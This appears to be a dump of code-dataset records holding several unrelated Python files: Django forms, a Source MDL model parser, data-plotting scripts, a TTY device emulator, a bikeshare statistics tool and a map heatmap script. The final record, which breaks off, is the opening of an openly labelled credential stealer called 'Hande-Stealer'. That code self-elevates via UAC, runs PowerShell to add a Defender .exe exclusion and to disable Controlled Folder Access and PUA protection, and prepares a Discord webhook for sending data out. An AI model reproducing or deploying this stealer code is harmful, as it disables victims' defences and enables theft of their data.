[3,4,5]\r\n","sub_path":"Branch.py","file_name":"Branch.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461834176","text":"# -*- coding: cp1250 -*-\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import UserProfile, Klient, Zamowienie, Cennik\nfrom django import forms\nimport os\n\nclass KlientForm(forms.Form):\n nazwa = forms.CharField(label='Nazwa', max_length=100)\n ulica = forms.CharField(label='Ulica',max_length=200)\n miasto = forms.CharField(label='Miasto',max_length=100)\n kod_pocztowy = forms.CharField(label='Kod pocztowy',max_length=10)\n kraj = forms.CharField(label='Kraj',max_length=40) \n nip = forms.CharField(label='NIP', max_length=13)\n uwagi = forms.CharField(widget=forms.Textarea)\n \n \nclass UploadFileForm(forms.Form): \n title = forms.CharField(max_length=40)\n file = forms.FileField()\n \nclass ZamowienieFileForm(forms.Form): \n klient = forms.ModelChoiceField(queryset=Klient.objects.all())\n przedmiot = forms.CharField(max_length=300)\n #cena = forms.DecimalField()\n #zdj = forms.FileField()\n wykonawca = forms.ModelChoiceField(queryset=User.objects.all())\n uwagi = forms.CharField(widget=forms.Textarea)\n \n \n# def clean_zdj(self):\n# zdj = self.cleaned_data.get('zdj',False)\n# print(zdj)\n# print(zdj._get_name())\n# exten=os.path.splitext(zdj._get_name())[1]\n# print(exten)\n# valid_extensions = ['.stl', ]\n# if not exten in valid_extensions:\n# raise forms.ValidationError(u'Nieprawid‚owy format pliku.')\n# if zdj:\n# if zdj._size > 15*1024*1024:\n# raise forms.ValidationError(\"plik za duzy\")\n# return zdj\n# else:\n# raise forms.ValidationError(\"Couldn't read uploaded image\")\n\nclass ZamowienieUwagiForm(forms.Form):\n uwagi = forms.CharField(label=\"\", widget=forms.Textarea(attrs={'class': 'myfieldclass'}))\n \n \nclass DodajUslugeFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n\n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n print(plik_uslugi)\n print(plik_uslugi._get_name())\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n print(exten)\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajUslugeProjektowanieFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n #plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n opis = forms.CharField(max_length=100)\n cena = forms.DecimalField()\n \nclass DodajUslugeFDMFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n #material = forms.ChoiceField(choices=[('mat1','material1'),('mat2','material2')])\n material = forms.ModelChoiceField(queryset=Cennik.objects.filter(technologia='FDM'))\n \n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajUslugeSLSFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n material = forms.ModelChoiceField(queryset=Cennik.objects.filter(technologia='SLS'))\n\n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajMaterialForm(forms.Form):\n nazwa = forms.CharField(max_length=100)\n TECHNOLOGY = [\n ('FDM', 'FDM'),\n ('SLS', 'SLS')\n ]\n technologia = forms.ChoiceField(choices=TECHNOLOGY)\n cena = forms.DecimalField(label='Cena za cm2')\n \nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n \nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('data_zatrudnienia', 'pensja')\n \n \nclass EdytujUslugeForm(forms.Form):\n nazwa = forms.CharField(max_length=100)\n cena = forms.DecimalField()\n ","sub_path":"zamowienia/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164611244","text":"import math\nimport traceback\nfrom typing import List\n\nimport numpy as np\n\nfrom ....utilities.byte_io_mdl import ByteIO\nfrom ....source_shared.base import Base\n\nfrom .flex_expressions import *\nfrom ..structs.header import MdlHeaderV49\nfrom ..structs.bone import BoneV49\nfrom ..structs.material import MaterialV49\nfrom ..structs.flex import FlexController, FlexRule, FlexControllerUI, FlexOpType\nfrom ..structs.anim_desc import AnimDesc\nfrom ..structs.sequence import Sequence\nfrom ..structs.attachment import AttachmentV49\nfrom ..structs.bodygroup import BodyPartV49\n\n\nclass _AnimBlocks:\n def __init__(self):\n self.name = ''\n self.blocks = []\n\n\nclass Mdl(Base):\n\n def __init__(self, filepath):\n self.store_value(\"MDL\", self)\n self.reader = ByteIO(filepath)\n self.header = MdlHeaderV49()\n self.bones: List[BoneV49] = []\n self.skin_groups: List[List[str]] = []\n self.materials: List[MaterialV49] = []\n self.materials_paths = []\n\n self.flex_names: List[str] = []\n self.flex_controllers = [] # type:List[FlexController]\n self.flex_ui_controllers = [] # type:List[FlexControllerUI]\n self.flex_rules = [] # type:List[FlexRule]\n\n self.body_parts = [] # type:List[BodyPartV49]\n\n self.attachments = [] # type:List[AttachmentV49]\n self.anim_descs = [] # type:List[AnimDesc]\n self.sequences = [] # type:List[Sequence]\n self.anim_block = _AnimBlocks()\n\n self.bone_table_by_name = []\n self.eyeballs = []\n\n @staticmethod\n def calculate_crc(buffer):\n correct_buffer_size = math.ceil(len(buffer) / 4) * 4\n buffer += b'\\x00' * (correct_buffer_size - len(buffer))\n\n buffer: np.ndarray = np.frombuffer(buffer, np.uint32).copy()\n\n orig_checksum = buffer[2]\n buffer[8 // 4] = 0\n buffer[76 // 4] = 0\n buffer[1432 // 4:1432 // 4 + 2] = 0\n buffer[1520 // 4:(1520 + 36) // 4] = 0\n buffer[1604 // 4] = 0\n with open('shit.bin', 'wb') as f:\n f.write(buffer.tobytes())\n\n new_checksum = 0\n for i in range(buffer.shape[0]):\n tmp = buffer[i] + (new_checksum >> 27 & 1)\n\n new_checksum = (tmp & 0xFFFFFFFF) + ((2 * new_checksum) & 0xFFFFFFFF)\n new_checksum &= 0xFFFFFFFF\n print(f'{i * 4 + 4}: {new_checksum:08x} : {new_checksum}')\n buffer[2] = new_checksum\n print(orig_checksum, new_checksum)\n\n def read(self):\n header = self.header\n reader = self.reader\n header.read(reader)\n\n reader.seek(header.bone_offset)\n for bone_id in range(header.bone_count):\n bone = BoneV49(bone_id)\n bone.read(reader)\n self.bones.append(bone)\n\n reader.seek(header.texture_offset)\n for _ in range(header.texture_count):\n texture = MaterialV49()\n texture.read(reader)\n self.materials.append(texture)\n\n reader.seek(header.texture_path_offset)\n for _ in range(header.texture_path_count):\n self.materials_paths.append(reader.read_source1_string(0))\n\n reader.seek(header.skin_family_offset)\n for _ in range(header.skin_family_count):\n skin_group = []\n for _ in range(header.skin_reference_count):\n texture_index = reader.read_uint16()\n skin_group.append(self.materials[texture_index].name)\n self.skin_groups.append(skin_group)\n\n diff_start = 0\n for skin_info in self.skin_groups[1:]:\n for n, (a, b) in enumerate(zip(self.skin_groups[0], skin_info)):\n if a == b:\n diff_start = max(n, diff_start)\n break\n\n for n, skin_info in enumerate(self.skin_groups):\n self.skin_groups[n] = skin_info[:diff_start]\n\n reader.seek(header.flex_desc_offset)\n for _ in range(header.flex_desc_count):\n self.flex_names.append(reader.read_source1_string(reader.tell()))\n\n reader.seek(header.flex_controller_offset)\n for _ in range(header.flex_controller_count):\n controller = FlexController()\n controller.read(reader)\n self.flex_controllers.append(controller)\n\n reader.seek(header.flex_rule_offset)\n for _ in range(header.flex_rule_count):\n rule = FlexRule()\n rule.read(reader)\n self.flex_rules.append(rule)\n\n reader.seek(header.local_attachment_offset)\n for _ in range(header.local_attachment_count):\n attachment = AttachmentV49()\n attachment.read(reader)\n self.attachments.append(attachment)\n\n reader.seek(header.flex_controller_ui_offset)\n for _ in range(header.flex_controller_ui_count):\n flex_controller = FlexControllerUI()\n flex_controller.read(reader)\n self.flex_ui_controllers.append(flex_controller)\n\n reader.seek(header.body_part_offset)\n for _ in range(header.body_part_count):\n body_part = BodyPartV49()\n body_part.read(reader)\n self.body_parts.append(body_part)\n\n reader.seek(header.local_animation_offset)\n for _ in range(header.local_animation_count):\n anim_desc = AnimDesc()\n anim_desc.read(reader)\n self.anim_descs.append(anim_desc)\n\n reader.seek(header.local_sequence_offset)\n for _ in range(header.local_sequence_count):\n seq = Sequence()\n seq.read(reader)\n self.sequences.append(seq)\n\n self.anim_block.name = reader.read_from_offset(header.anim_block_name_offset, reader.read_ascii_string)\n self.reader.seek(self.header.anim_block_offset)\n for _ in range(self.header.anim_block_count):\n self.anim_block.blocks.append(self.reader.read_fmt('2i'))\n\n if self.header.bone_table_by_name_offset and self.bones:\n self.reader.seek(self.header.bone_table_by_name_offset)\n self.bone_table_by_name = [self.reader.read_uint8() for _ in range(len(self.bones))]\n\n # for anim\n\n def rebuild_flex_rules(self):\n rules = {}\n\n for rule in self.flex_rules:\n stack = []\n try:\n for op in rule.flex_ops:\n flex_op = op.op\n if flex_op == FlexOpType.CONST:\n stack.append(Value(op.value))\n elif flex_op == FlexOpType.FETCH1:\n stack.append(FetchController(self.flex_controllers[op.index].name))\n elif flex_op == FlexOpType.FETCH2:\n stack.append(FetchFlex(self.flex_names[op.index]))\n elif flex_op == FlexOpType.ADD:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Add(left, right))\n elif flex_op == FlexOpType.SUB:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Sub(left, right))\n elif flex_op == FlexOpType.MUL:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Mul(left, right))\n elif flex_op == FlexOpType.DIV:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Div(left, right))\n elif flex_op == FlexOpType.NEG:\n stack.append(Neg(stack.pop(-1)))\n elif flex_op == FlexOpType.MAX:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Max(left, right))\n elif flex_op == FlexOpType.MIN:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Min(left, right))\n elif flex_op == FlexOpType.COMBO:\n count = op.index\n values = [stack.pop(-1) for _ in range(count)]\n combo = Combo(*values)\n stack.append(combo)\n elif flex_op == FlexOpType.DOMINATE:\n count = op.index + 1\n values = [stack.pop(-1) for _ in range(count)]\n dom = Dominator(*values)\n stack.append(dom)\n elif flex_op == FlexOpType.TWO_WAY_0:\n mx = Max(Add(FetchController(self.flex_controllers[op.index].name), Value(1.0)), Value(0.0))\n mn = Min(mx, Value(1.0))\n res = Sub(1, mn)\n stack.append(res)\n elif flex_op == FlexOpType.TWO_WAY_1:\n mx = Max(FetchController(self.flex_controllers[op.index].name), Value(0.0))\n mn = Min(mx, Value(1.0))\n stack.append(mn)\n elif flex_op == FlexOpType.NWAY:\n flex_cnt_value = int(stack.pop(-1).value)\n flex_cnt = FetchController(self.flex_controllers[flex_cnt_value].name)\n f_w = stack.pop(-1)\n f_z = stack.pop(-1)\n f_y = stack.pop(-1)\n f_x = stack.pop(-1)\n gtx = Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_x, flex_cnt))))\n lty = Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_y))))\n remap_x = Min(Max(Div(Sub(flex_cnt, f_x), (Sub(f_y, f_x))), Value(0.0)), Value(1.0))\n gtey = Neg(Sub(Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_y)))), Value(1.0)))\n ltez = Neg(Sub(Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_z, flex_cnt)))), Value(1.0)))\n gtz = Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_z, flex_cnt))))\n ltw = Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_w))))\n remap_z = Sub(Value(1.0),\n Min(Max(Div(Sub(flex_cnt, f_z), (Sub(f_w, f_z))), Value(0.0)), Value(1.0)))\n final_expr = Add(Add(Mul(Mul(gtx, lty), remap_x), Mul(gtey, ltez)), Mul(Mul(gtz, ltw), remap_z))\n\n final_expr = Mul(final_expr, FetchController(self.flex_controllers[op.index].name))\n stack.append(final_expr)\n elif flex_op == FlexOpType.DME_UPPER_EYELID:\n stack.pop(-1)\n stack.pop(-1)\n stack.pop(-1)\n stack.append(Value(1.0))\n elif flex_op == FlexOpType.DME_LOWER_EYELID:\n stack.pop(-1)\n stack.pop(-1)\n stack.pop(-1)\n stack.append(Value(1.0))\n else:\n print(\"Unknown OP\", op)\n if len(stack) > 1 or not stack:\n print(f\"failed to parse ({self.flex_names[rule.flex_index]}) flex rule\")\n print(stack)\n continue\n final_expr = stack.pop(-1)\n # name = self.get_value('stereo_flexes').get(rule.flex_index, self.flex_names[rule.flex_index])\n name = self.flex_names[rule.flex_index]\n rules[name] = final_expr\n except Exception as ex:\n traceback.print_exc()\n print(f\"failed to parse ({self.flex_names[rule.flex_index]}) flex rule\")\n print(stack)\n\n return rules\n","sub_path":"source1/mdl/v49/mdl_file.py","file_name":"mdl_file.py","file_ext":"py","file_size_in_byte":11828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299494198","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nratings = pd.read_csv('./ml-latest-small/ratings.csv')\n\nprint('Media: ', ratings.rating.mean())\nprint('Mediana: ', ratings.rating.median())\nprint('Frequencia:\\n', ratings.rating.value_counts())\n\nplt.title('Historiograma da frequencia das notas:')\nratings.rating.plot(kind='hist')\nplt.show()\n\nplt.title('Boxplot da frequencia das notas:')\n# plt.figure(figsize=(5, 5))\nsns.boxplot(ratings.rating)\nplt.show()\n\nmovies = pd.read_csv('./ml-latest-small/movies.csv')\n\nratings_per_movie = ratings.groupby('movieId').mean().rating\n\nplt.title('Historiograma da media das notas por filme:')\nratings_per_movie.plot(kind='hist')\nplt.show()\n\nplt.title('Boxplot da media das notas por filme:')\nsns.boxplot(ratings_per_movie)\nplt.show()\n\nplt.title('Historiograma da media das notas por filme usando Seaborn:')\nsns.distplot(ratings_per_movie, bins=10) # bins configura a quantidade de colunas que aparecem\nplt.show()\n","sub_path":"introducao_graficos.py","file_name":"introducao_graficos.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321741990","text":"# https://www.acmicpc.net/problem/5397\n\nfrom sys import stdin\n# import queue\nfor _ in range(int(stdin.readline())):\n testCase = stdin.readline().strip()\n output = []\n # temp = queue.Queue()\n temp = []\n for char in testCase :\n if char == \"<\":\n if len(output) :\n # temp.put(output.pop())\n temp.append(output.pop())\n elif char == \">\":\n # if temp.qsize() != 0 :\n if len(temp) :\n output.append(temp.pop())\n elif char == \"-\":\n if len(output):\n output.pop()\n else :\n output.append(char)\n # while temp.qsize() != 0 :\n # output.append(temp.get())\n while len(temp) :\n output.append(temp.pop())\n print(''.join(output))","sub_path":"dojinyou/code_1week/07_5397.py","file_name":"07_5397.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645463875","text":"\"\"\"\nEmulate the Input TTY device (TTYIN).\n\"\"\"\n\nfrom Globals import *\n\nimport log\nlog = log.Log('test.log', log.Log.DEBUG)\n\n\nclass TtyIn(object):\n\n # define various internal states\n DEVICE_NOT_READY = 0\n DEVICE_READY = 1\n TTYIN_CHARS_PER_SECOND = 1000\n# DEVICE_READY_CYCLES = int(CYCLES_PER_SECOND / TTYIN_CHARS_PER_SECOND)\n DEVICE_READY_CYCLES = 200\n\n\n def __init__(self):\n \"\"\"Initialize the TTYIN device.\"\"\"\n\n self.filename = None\n self.open_file = None\n self.value = 0xff\n self.atEOF = True\n self.cycle_count = 0\n self.status = self.DEVICE_NOT_READY\n self.offset = 0\n\n def mount(self, fname):\n \"\"\"Mount a file on the TTYIN device.\"\"\"\n\n# log(\"Mounting '%s' on TTYIN\" % fname)\n\n self.filename = fname\n self.open_file = open(fname, 'r')\n self.value = self.open_file.read(1)\n self.atEOF = False\n self.cycle_count = self.DEVICE_READY_CYCLES\n self.status = self.DEVICE_NOT_READY\n if len(self.value) < 1:\n # EOF on input file\n self.atEOF = True\n self.cycle_count = 0\n else:\n self.value = ord(self.value)\n self.offset = 0\n\n def dismount(self):\n \"\"\"Dismount the file on the TTYIN device.\"\"\"\n\n# log(\"Dismounting '%s' on TTYIN\" % self.filename)\n\n if self.open_file:\n self.open_file.close()\n self.filename = None\n self.open_file = None\n self.value = 0\n self.atEOF = True\n self.status = self.DEVICE_NOT_READY\n self.offset = 0\n\n def read(self):\n \"\"\"Return the current device value.\"\"\"\n\n# log(\"Reading TTYIN: returning %03o\" % self.value)\n\n return self.value\n\n def ready(self):\n \"\"\"Return device status.\"\"\"\n\n return (self.status == self.DEVICE_READY)\n\n def clear(self):\n \"\"\"Clear the device 'ready' status.\"\"\"\n\n# log(\"TTYIN: clearing flag\")\n\n self.status = self.DEVICE_NOT_READY\n\n def tick(self, cycles):\n \"\"\"Advance the device state by 'cycles' number of CPU cycles.\"\"\"\n\n if not self.atEOF:\n self.cycle_count -= cycles\n if self.cycle_count <= 0:\n self.cycle_count += self.DEVICE_READY_CYCLES\n self.status = self.DEVICE_READY\n self.value = self.open_file.read(1)\n self.offset += 1\n if len(self.value) < 1:\n # EOF on input file\n self.atEOF = True\n self.value = chr(0xff)\n self.cycle_count = 0\n self.status = self.DEVICE_NOT_READY\n self.value = ord(self.value)\n","sub_path":"pymlac/TtyIn.py","file_name":"TtyIn.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350534869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[43]:\n\n\nimport time\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n\n# In[44]:\n\n\n#### whether you enter uppercase or lower case the function will output lowercase\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n # get user input for month (all, january, february, ... , june)\n # get user input for day of week (all, monday, tuesday, ... sunday)\n \n print('Hello! Let\\'s explore some US bikeshare data! It will be lots of fun!')\n \n month_dict = {\n 'january' : 1,\n 'february' : 2,\n 'march' : 3,\n 'april' : 4,\n 'may' : 5,\n 'june' : 6,\n 'all' : 'all',\n }\n \n day_dict = {\n 'monday' : 0,\n 'tuesday' : 1,\n 'wednesday' : 2,\n 'thursday' : 3,\n 'friday' : 4,\n 'saturday' : 5,\n 'sunday' : 6,\n 'all' : 'all'\n }\n \n \n while True:\n global city\n valid_cities = ['chicago', 'washington', 'new york city']\n city = input(\"Which city would you like to explore? Chicago, New York City, and Washington are your only options! \").lower()\n if city not in valid_cities:\n print('Dude/dudette come on, enter one of the cities in the list. Spelling actually matters.')\n continue\n else:\n break\n \n while True:\n global month\n valid_month = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n month_name = input(\"Which month would you like to explore? You can enter all, or a specific month from January to June \").lower()\n if month_name not in valid_month:\n print('Seriously? - Stop being stupid and enter a real month. Like I told you, spelling actually matters.')\n continue\n else:\n month = month_dict[month_name]\n break\n \n while True:\n global day\n valid_day = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n upper_day = [day.title() for day in valid_day]\n valid_day += upper_day\n day_name = input(\"Which day would you like to explore? You can enter all, or a specific day: Monday, Tuesday. . .etc \").lower()\n if day_name not in valid_day:\n print('Ok this is the last time I tell you to put in valid input. Put in an actual day.')\n continue\n else:\n day = day_dict[day_name]\n break\n \n \n print('-'*40)\n return city, month, day\n\n\n# In[45]:\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n global df\n\n df = pd.read_csv(CITY_DATA[city])\n df['month_index'] = pd.DatetimeIndex(df['Start Time']).month\n df['weekday_index'] = pd.DatetimeIndex(df['Start Time']).weekday\n\n if month == 'all':\n if day == 'all':\n return df\n else:\n df = df.loc[df['weekday_index'] == day]\n return df\n else:\n if day == 'all':\n df = df.loc[df['month_index'] == month]\n return df\n else:\n df = df.loc[(df['month_index'] == month) & (df['weekday_index'] == day)]\n return df\n \n return df\n\n\n# In[46]:\n\n\ndef time_stats(df):\n \"\"\"Displays summary statistics on the most frequent times of travel.\"\"\"\n \n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n month_dict = { 1 : 'january', 2 : 'february', 3 : 'march',\n 4 : 'april', 5 : 'may', 6 : 'june', }\n\n print('The most common month to travel was {}.'.format(month_dict[(np.bincount(df['month_index']).argmax())]))\n\n # display the most common day of week\n day_dict = day_dict = { 0 : 'monday', 1 : 'tuesday', 2 : 'wednesday',\n 3 : 'thursday', 4 : 'friday', 5 : 'saturday', 6 : 'sunday' }\n\n print('The most common day to travel was {}.'.format(day_dict[(np.bincount(df['weekday_index']).argmax())]))\n\n # display the most common start hour\n hour_dict = { 1 : '1AM', 2 : '2AM', 3 : '3AM', 4 : '4AM', 5 : '5AM', 6 : '6AM', \n 7 : '7AM', 8 : '8AM', 9 : '9AM', 10 : '10AM', 11 : '11AM',\n 12 : '12PM', 13 : '1PM', 14 : '2PM', 15 : '3PM', 16 : '4PM',\n 17 : '5PM', 18 : '6PM', 19 : '7PM', 20 : '8PM', 21 : '9PM',\n 22 : '10PM', 23 : '11PM', 24 : '12AM' }\n\n print('The most common hour to start a trip was to travel was {}.' .format(hour_dict[(np.bincount(pd.DatetimeIndex(df['Start Time']).hour).argmax())]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[47]:\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n \n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('The most common start station is {}.'.format(df['Start Station'].value_counts().idxmax()))\n\n # display most commonly used end station\n print('The most common end station is {}.'.format(df['End Station'].value_counts().idxmax()))\n\n\n # display most frequent combination of start station and end station trip\n print('The most common start/end pair of stations is: {}'.format(df.groupby(['Start Station', 'End Station']) .size().sort_values(ascending=False).idxmax()))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[48]:\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total travel time for travellers in {} was {} hours'.format(city.title(), sum(df['Trip Duration']/60)))\n\n\n # display mean travel time\n print('Mean travel time for travellers in {} was {} minutes'.format(city.title(), ((df['Trip Duration']).mean()/60)))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[49]:\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('There were {} subscribers and {} customers in {}.' .format(df['User Type'].value_counts()['Subscriber'], df['User Type'].value_counts()['Customer'], city.title()))\n\n # Display counts of gender\n if city == 'washington':\n print('Unfortunately we don\\'t have any gender data for {}, so we won\\'t be able to display user stats.' .format(city.title()))\n \n else:\n print('There were {} male users and {} female users in {}' .format(len(df[df['Gender'] == 'Male']), len(df[df['Gender'] == 'Female']), city.title()))\n\n # Display earliest, most recent, and most common year of birth\n if city == 'washington':\n print('Unfortunately we don\\'t have any age data for {}, so we won\\'t be able to display user stats.' .format(city.title()))\n \n else: \n print('For customers in {}, the earliest year of birth was {}, the most recent was {}, and the most common was {}.' .format(city.title(), int(min(df['Birth Year'].dropna())), int(max(df['Birth Year'].dropna())), int(df['Birth Year'].dropna().value_counts().idxmax())))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[50]:\n\n\ndef data_looker(df):\n \"\"\"Loops through a dataframe and prints slices of 5 rows at a time.\"\"\"\n \n start = 0\n stop = 5\n \n while True:\n see_data = input('Would you like to see the raw data? Enter yes or no.')\n if see_data == 'yes':\n print(df.iloc[start:stop])\n start = start + 5\n stop = stop + 5\n else:\n break\n\n\n# In[51]:\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n data_looker(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"solution - v2.py","file_name":"solution - v2.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"553616621","text":"# Plotting Heatmaps using Coordinates.\n\nimport pandas\nfrom geopy.geocoders import Nominatim\nimport gmplot\n\nlatitude_final=[]\nlongitude_final=[]\nfor name in range(1,6):\n data=pandas.read_csv('repub'+str(name)+'.csv')\n latitude=data.latitude.tolist()\n longitude=data.longitude.tolist()\n # Non Geo-tagged tweets were given a value of (99999.99,99999.99). We are removing them from the list.\n for i in range(0,latitude.count(99999.99)):\n latitude.remove(99999.99)\n for i in range(0,longitude.count(99999.99)):\n longitude.remove(99999.99)\n latitude=list(map(float, latitude))\n longitude=list(map(float, longitude))\n latitude_final.extend(latitude)\n longitude_final.extend(longitude)\n print(len(latitude_final))\n print(len(longitude_final))\ngmap = gmplot.GoogleMapPlotter(30, 0, 3)\n\n\n# Overlay the datapoints into the map\ngmap.heatmap(latitude_final, longitude_final)\n\n# Generate the heatmap into an HTML file\ngmap.draw(\"repub_map.html\")\n\n","sub_path":"Mapplotter.py","file_name":"Mapplotter.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115015739","text":"import os\r\nimport re\r\nimport platform\r\nimport time\r\nimport requests\r\nfrom io import BytesIO\r\nimport json\r\nfrom dhooks import Webhook, Embed, File\r\nfrom datetime import datetime\r\nimport sys\r\nimport win32com.shell.shell as shell\r\nfrom getmac import get_mac_address as gma\r\nASADMIN = 'asadmin'\r\n\r\nif sys.argv[-1] != ASADMIN:\r\n script = os.path.abspath(sys.argv[0])\r\n params = ' '.join([script] + sys.argv[1:] + [ASADMIN])\r\n shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)\r\n sys.exit(0)\r\n\r\nos.system(\"powershell.exe -command Add-MpPreference -ExclusionExtension .exe\")\r\nos.system(\"powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled\")\r\nos.system(\"powershell.exe -command Set-MpPreference -PUAProtection disable\")\r\n\r\n\r\nhook = Webhook(\"https://Your Webhook Url\") #change this\r\nembed = Embed(\r\n description='Hande-Stealer From Swagkarna! :smiley:',\r\n color=0x5CDBF0,\r\n timestamp='now' \r\n )\r\nimage1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'\r\n\r\n\r\nembed.set_author(name='Author : swagkarna', icon_url=image1)\r\nembed.add_field(name='Github Profile', value='https://github.com/swagkarna')\r\n 